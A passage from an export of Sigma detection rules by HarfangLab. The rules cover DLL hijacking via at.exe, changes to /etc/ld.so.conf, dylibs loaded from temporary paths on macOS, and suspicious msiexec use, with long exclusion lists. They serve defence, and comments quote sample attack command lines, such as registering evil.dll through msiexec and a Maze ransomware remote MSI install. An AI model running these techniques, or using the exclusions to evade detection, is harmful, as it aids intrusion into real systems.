"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094827Z",
"creation_date": "2026-03-23T11:45:34.094829Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094833Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_at.yml",
"content": "title: DLL Hijacking via at.exe\nid: fe94c773-1caa-44a0-876e-01e264b73dea\ndescription: |\n Detects potential Windows DLL Hijacking via at.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'at.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\cryptdll.dll'\n - '\\d3d10_1core.dll'\n - '\\d3d10_1.dll'\n - '\\d3d10core.dll'\n - '\\d3d10.dll'\n - '\\d3d11.dll'\n - '\\dxgi.dll'\n - '\\IPHLPAPI.DLL'\n - '\\netutils.dll'\n - '\\NtlmShared.dll'\n - '\\schedcli.dll'\n - '\\snmpapi.dll'\n - '\\sspicli.dll'\n - '\\winmm.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n 
Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fe94c773-1caa-44a0-876e-01e264b73dea",
"rule_name": "DLL Hijacking via at.exe",
"rule_description": "Detects potential Windows DLL Hijacking via at.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fe966a39-d58c-4285-9fc4-25b1b3a10425",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.677667Z",
"creation_date": "2026-03-23T11:45:35.297608Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.297612Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://tbhaxor.com/exploiting-shared-library-misconfigurations/",
"https://attack.mitre.org/techniques/T1574/006/"
],
"name": "t1574_006_ld_config_modified.yml",
"content": "title: Dynamic Linker Configuration Modified\nid: fe966a39-d58c-4285-9fc4-25b1b3a10425\ndescription: |\n Detects an attempt to modify the configuration of the dynamic linker (/etc/ld.so.conf).\n These modifications can be used by attackers to hijack library loading processes, enabling malicious library injection, process monitoring, or the concealment of malicious activities through library preloading.\n It is recommended to investigate all dynamic linker configuration changes and identify unauthorized library loading attempts.\nreferences:\n - https://tbhaxor.com/exploiting-shared-library-misconfigurations/\n - https://attack.mitre.org/techniques/T1574/006/\ndate: 2022/11/10\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1574.006\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.Hijacking\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path:\n - '/etc/ld.so.conf'\n - '/etc/ld.so.conf.d/*'\n - TargetPath:\n - '/etc/ld.so.conf'\n - '/etc/ld.so.conf.d/*'\n is_read_access:\n Kind: 'access'\n Permissions: 'read'\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - 
'/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf'\n - '/usr/bin/python* /usr/bin/dnf'\n - 'dnf upgrade'\n - 'dnf update'\n - 'dnf reinstall'\n - 'dnf remove'\n exclusion_snapd:\n - ProcessImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessParentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessGrandparentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n exclusion_rpm:\n - ProcessImage: '/usr/bin/rpm'\n - 
ProcessParentCommandLine|startswith: '/bin/sh /var/tmp/rpm-tmp.'\n - ProcessGrandparentCommandLine|startswith: '/bin/sh /var/tmp/rpm-tmp.'\n exclusion_pacman:\n ProcessImage: '/usr/bin/pacman'\n exclusion_package_cleanup:\n ProcessCommandLine|startswith: '/usr/bin/python /bin/package-cleanup '\n\n exclusion_pum_worker:\n ProcessCommandLine|startswith: '/usr/libexec/platform-python -Estt /usr/local/psa/admin/sbin/pum_worker'\n\n exclusion_kaniko:\n ProcessImage: '/kaniko/executor'\n\n exclusion_sophos:\n ProcessImage: '/opt/sophos-av/engine/_/savscand.1'\n\n exclusion_docker:\n ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n\n exclusion_docker2:\n ProcessImage|endswith: '/bin/dockerd'\n ProcessCommandLine: 'docker-applyLayer *'\n\n exclusion_docker3:\n ProcessCommandLine|contains|all:\n - 'docker-untar'\n - '/var/lib/docker/overlay'\n ProcessParentCommandLine|startswith: '/usr/sbin/dockerd'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_chmod:\n ProcessCommandLine: '/bin/chmod'\n\n exclusion_vmware:\n ProcessCommandLine|contains:\n - 'vmware-config-tools'\n - 'vmware-uninstall-tools.pl'\n\n 
exclusion_podman:\n ProcessImage: '/usr/bin/podman'\n\n exclusion_qemu:\n ProcessImage: '/usr/bin/qemu-aarch64-static'\n ProcessParentImage: '/usr/bin/qemu-aarch64-static'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? 
; '\n\n exclusion_alternatives:\n ProcessImage:\n - '/usr/sbin/alternatives'\n - '/usr/bin/update-alternatives'\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n exclusion_installphp:\n ProcessCommandLine|startswith: '/bin/sh /usr/local/bin/install-php-extensions'\n\n exclusion_zscaler:\n ProcessCommandLine:\n - './zscaler-linux-*-installer.run'\n - 'sed -i /zscaler/d /etc/ld.so.conf'\n\n exclusion_packagekitd:\n ProcessImage: '/usr/libexec/packagekitd'\n\n exclusion_nvidia:\n ProcessImage:\n - '/usr/bin/nvidia-ctk'\n - '/usr/bin/nvidia-cdi-hook'\n\n exclusion_buildah:\n - ProcessImage: '/usr/bin/buildah'\n - ProcessAncestors|contains: '|/usr/bin/buildah|'\n\n exclusion_crio:\n - ProcessAncestors|contains: '|/usr/bin/crio|'\n - ProcessParentImage: '/usr/bin/crio'\n\n\n condition: selection and not is_read_access and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fe966a39-d58c-4285-9fc4-25b1b3a10425",
"rule_name": "Dynamic Linker Configuration Modified",
"rule_description": "Detects an attempt to modify the configuration of the dynamic linker (/etc/ld.so.conf).\nThese modifications can be used by attackers to hijack library loading processes, enabling malicious library injection, process monitoring, or the concealment of malicious activities through library preloading.\nIt is recommended to investigate all dynamic linker configuration changes and identify unauthorized library loading attempts.\n",
"rule_creation_date": "2022-11-10",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1574.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "feae5a22-5c3e-491a-8dcf-83c9d04fa8f8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296411Z",
"creation_date": "2026-03-23T11:45:35.296413Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296417Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cloud.google.com/blog/topics/threat-intelligence/north-korea-supply-chain/?hl=en",
"https://attack.mitre.org/techniques/T1129/"
],
"name": "t1129_dylib_tmp.yml",
"content": "title: Dylib Loaded from a Temporary Path\nid: feae5a22-5c3e-491a-8dcf-83c9d04fa8f8\ndescription: |\n Detects a dylib library being loaded from a temporary folder.\n Adversaries load libraries from a temporary path to extend capabilities of their tools dynamically.\n It is recommended to check the origin of the library to determine its legitimacy.\nreferences:\n - https://cloud.google.com/blog/topics/threat-intelligence/north-korea-supply-chain/?hl=en\n - https://attack.mitre.org/techniques/T1129/\ndate: 2024/09/26\nmodified: 2026/02/23\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1129\n - classification.macOS.Source.LibraryLoaded\nlogsource:\n category: library_event\n product: macos\ndetection:\n selection:\n ImageLoaded|re: '^/private/tmp/[^/]+$'\n\n filter_path:\n ProcessImage|startswith: '/private/tmp/'\n\n exclusion_path:\n Image|startswith:\n - '/Applications/'\n - '/Library/Application Support/'\n - '/private/var/folders/??/*/?/AppTranslocation/'\n - '/system/library/frameworks/audiotoolbox.framework/xpcservices/auhostingservicexpc_arrow.xpc/contents/macos/auhostingservicexpc_arrow'\n - '/opt/homebrew/Cellar/opencode/*/libexec/lib/node_modules/opencode-ai/node_modules/opencode-darwin-arm64/bin/opencode'\n\n exclusion_claude:\n ProcessSignatureSigningId: 'com.anthropic.claude-code'\n ProcessSigned: 'true'\n\n exclusion_orc:\n ImageLoaded|startswith: '/private/tmp/orcexec'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "feae5a22-5c3e-491a-8dcf-83c9d04fa8f8",
"rule_name": "Dylib Loaded from a Temporary Path",
"rule_description": "Detects a dylib library being loaded from a temporary folder.\nAdversaries load libraries from a temporary path to extend capabilities of their tools dynamically.\nIt is recommended to check the origin of the library to determine its legitimacy.\n",
"rule_creation_date": "2024-09-26",
"rule_modified_date": "2026-02-23",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1129"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fef9352b-f1be-4144-be70-7134db04d446",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620284Z",
"creation_date": "2026-03-23T11:45:34.620286Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620290Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Msiexec/",
"https://attack.mitre.org/techniques/T1218/007/"
],
"name": "t1218_007_msiexec.yml",
"content": "title: Suspicious msiexec.exe Execution\nid: fef9352b-f1be-4144-be70-7134db04d446\ndescription: |\n Detects suspicious execution of the legitimate Windows binary msiexec.exe.\n Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\n Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).\n It is recommended to verify the legitimity of the MSI file.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Msiexec/\n - https://attack.mitre.org/techniques/T1218/007/\ndate: 2021/07/09\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.007\n - attack.privilege_escalation\n - attack.persistence\n - attack.t1546.016\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Msiexec\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: 'msiexec.exe'\n - OriginalFileName: 'msiexec.exe'\n\n # Installs the target .MSI file silently\n # msiexec /quiet /i cmd.msi\n selection_install:\n CommandLine|contains|all:\n - ' /quiet '\n - ' /i '\n\n # https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/\n # cmd /c msiexec /qn /i \\\\\\frs\\pikujuwusewa.msi\n selection_parent_cmd:\n ParentCommandLine|contains|all:\n - 'cmd'\n - ' /c '\n - ' /qn '\n - ' /i '\n - ' \\\\'\n\n # Calls DLLRegisterServer to register the target DLL\n # msiexec /y \"C:\\folder\\evil.dll\"\n selection_dllregisterserver:\n CommandLine|contains: ' /y '\n\n # This is handled by the rule 6cedca3d-1b27-4809-9533-e910d016c287\n filter_remote:\n CommandLine|contains:\n - ' http://'\n - ' https://'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - 
'?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_directory:\n CommandLine|contains:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - '?:\\Windows\\CCM\\'\n - '?:\\Program Files\\SMS_CCM\\'\n - '?:\\Windows\\system32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\ProgramData\\'\n - '?:\\Windows\\Installer\\{????????-????-????-????-????????????}\\'\n\n exclusion_commandline1:\n CommandLine|contains:\n - 'hurukai.io PORT=443 PROTO=https KEY='\n - 'hurukai.io PORT=443 PROTO=https SRV_SIG_PUB=* KEY=* PASSWORD=*'\n - ' REINSTALLMODE='\n - '\\Temp\\FortiClientVPN\\FortiClientVPN.msi /quiet /passive /norestart'\n # https://nxlog.co/products/nxlog-community-edition/download?field_pf_product_nid=All\n - '\\nxlog-ce-?.??.????.msi'\n - '\\nxlog-?.??.????_windows_x??.msi'\n - '\\nxlog-trial-?.??.????_windows_x??.msi'\n # /i \"C:\\AppData\\Roaming\\Matrix42\\Universal Agent Framework 1.0.125.0\\install\\Matrix42 Universal Agent Framework Setup 64.msi\" /quiet /norestart /l*v \"C:\\windows\\TEMP\\Matrix42\\Matrix42UniversalAgentFramework\\MSI_UAF_UEM Agent Windows.2108.1.2.0.log\" AI_SETUPEXEPATH=\"C:\\windows\\TEMP\\Matrix42\\Matrix42UniversalAgentFramework\\Matrix42 Universal Agent Framework Setup 64.exe\" SETUPEXEDIR=\"C:\\windows\\TEMP\\Matrix42\\Matrix42UniversalAgentFramework\\\" EXE_CMD_LINE=\"/exenoui /exenoupdates /exelang 0 /noprereqs /quiet /norestart /l*v 
\"\"C:\\windows\\TEMP\\Matrix42\\Matrix42UniversalAgentFramework\\MSI_UAF_UEM Agent Windows.2108.1.2.0.log\"\" \" AI_FOUND_PREREQS=\".NET Framework 4.0\"\n - '\\Matrix42\\Matrix42UniversalAgentFramework\\'\n # MSIEXEC.EXE /i C:\\PROGRA~3\\Lenovo\\SYSTEM~1\\SESSIO~1\\REPOSI~1\\K9KYB0~1\\x64\\Lenovo Calliope USB Keyboard.msi /qn TRANSFORMS=1033.MST SETUPEXEDIR=C:\\PROGRA~3\\Lenovo\\SYSTEM~1\\SESSIO~1\\REPOSI~1\\K9KYB0~1\\x64 SETUPEXENAME=setup_x64.exe\n - '\\Lenovo\\SYSTEM~1\\SESSIO~1\\REPOSI~1\\'\n\n exclusion_commandline2:\n # Citrix Update TrolleyExpress.exe\n ParentImage: '?:\\Windows\\SysWOW64\\config\\systemprofile\\Citrix\\UpdaterBinaries\\\\????????-????-????-????-????????????\\CitrixReceiver\\Ctx-????????-????-????-????-????????????\\Extract\\TrolleyExpress.exe'\n CommandLine: 'msiexec /i /quiet'\n\n exclusion_commandline3:\n # Webex\n # https://help.webex.com/fr-fr/article/nw5p67g/Installation-de-l%E2%80%99application-|-Webex-et-mise-%C3%A0-jour-automatique#Cisco_Reference.dita_de4f9295-316d-4e1c-8f47-329ddfdb984d\n CommandLine|contains|all:\n - '\\Webex.msi'\n - 'ENABLEOUTLOOKINTEGRATION='\n - 'DEFAULT_THEME='\n - 'AUTOSTART_WITH_WINDOWS='\n - 'ACCEPT_EULA='\n - 'ALLUSERS='\n\n exclusion_commandline4:\n ParentImage: '?:\\Packages\\Plugins\\Microsoft.Azure.Diagnostics.IaaSDiagnostics\\\\*\\DiagnosticsPlugin.exe'\n CommandLine: 'msiexec.exe /quiet /norestart /i ?:\\Packages\\Plugins\\Microsoft.Azure.Diagnostics.IaaSDiagnostics\\\\*\\InstrumentationEngine\\InstrumentationEngine.Installer.msi'\n\n exclusion_parent:\n - ParentImage:\n - '?:\\Program Files\\HarfangLab\\hurukai.exe'\n - '?:\\Windows\\Temp\\{????????-????-????-????-????????????}\\setup.exe'\n - '?:\\ProgramData\\ESET\\RemoteAdministrator\\Agent\\EraAgentApplicationData\\Data\\UpdaterService.exe'\n - '?:\\Program Files\\Microsoft Azure AD Connect Health Sync Agent\\Monitor\\Microsoft.Online.Reporting.MonitoringAgent.Updater.exe'\n - '?:\\Program 
Files\\Dell\\SupportAssistAgent\\bin\\SupportAssistInstaller.exe'\n - '?:\\Windows\\System32\\drvinst.exe'\n - '?:\\Windows\\CCM\\Ccm32BitLauncher.exe'\n - '?:\\Windows\\SoftwareDistribution\\Download\\Install\\msoledbsql??_x64_???.exe'\n - '?:\\Program Files (x86)\\Microsoft Intune Management Extension\\Microsoft.Management.Services.IntuneWindowsAgent.exe'\n - '?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\dcconfig.exe'\n - '?:\\Program Files\\Puppet Labs\\Puppet\\puppet\\bin\\ruby.exe'\n - ParentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n exclusion_grandparent:\n - GrandparentImage:\n - '?:\\Program Files (x86)\\LANDesk\\LDClient\\sdistbat.exe'\n - '?:\\Program Files\\MobiGame\\MobiGameUpdater.exe'\n - '?:\\Windows\\System32\\wuauclt.exe'\n - '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n - '?:\\Program Files (x86)\\wapt\\waptpython.exe'\n - '?:\\ProgramData\\NinjaRMMAgent\\download\\ninja_splashtop_streamer.exe'\n - '?:\\Program Files\\Puppet Labs\\Puppet\\puppet\\bin\\ruby.exe'\n - '?:\\Program Files (x86)\\Microsoft Intune Management Extension\\Microsoft.Management.Services.IntuneWindowsAgent.exe'\n - '?:\\Program Files\\AMD\\CCC2\\Install\\ccc2_install.exe'\n - '?:\\Windows\\CCM\\Ccm32BitLauncher.exe'\n - GrandparentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n exclusion_ivanti:\n ParentImage|endswith:\n - '\\STPlatformUpdater.exe'\n - '\\STPlatformUpdater64.exe'\n # msiexec.exe /i AgentInstaller.msi /qn INSTALLCOOKIE=1697e81f-d0e9-b141-9cd0-d475dc1e0d1c SERVERURI=https://xxx.domaine.com:3121 ISSUERCERTIFICATE=C:\\WINDOWS\\Temp\\fb72689b-2d4c-3079-a896-7fbca5324b0f\\f5beaf08548237b3a5b5ada06590419b.cer /liwearucmox C:\\Windows\\Temp\\STPlatformInstall_20220629_074830.log REBOOT=ReallySuppress /norestart\n CommandLine|contains|all:\n - 'msiexec.exe /i AgentInstaller.msi /qn '\n - '/liwearucmox'\n - 'SERVERURI='\n - ' REBOOT=ReallySuppress /norestart'\n\n exclusion_ccm:\n 
ProcessParentCommandLine|startswith: '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\WINDOWS\\ccmcache\\'\n\n exclusion_remote:\n ProcessParentCommandLine: 'msiexec /i \\\\\\\\*'\n\n condition: selection and\n (\n (selection_install and not 1 of exclusion_*) or\n selection_parent_cmd or\n (selection_dllregisterserver and not exclusion_directory)\n ) and not 1 of filter_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fef9352b-f1be-4144-be70-7134db04d446",
"rule_name": "Suspicious msiexec.exe Execution",
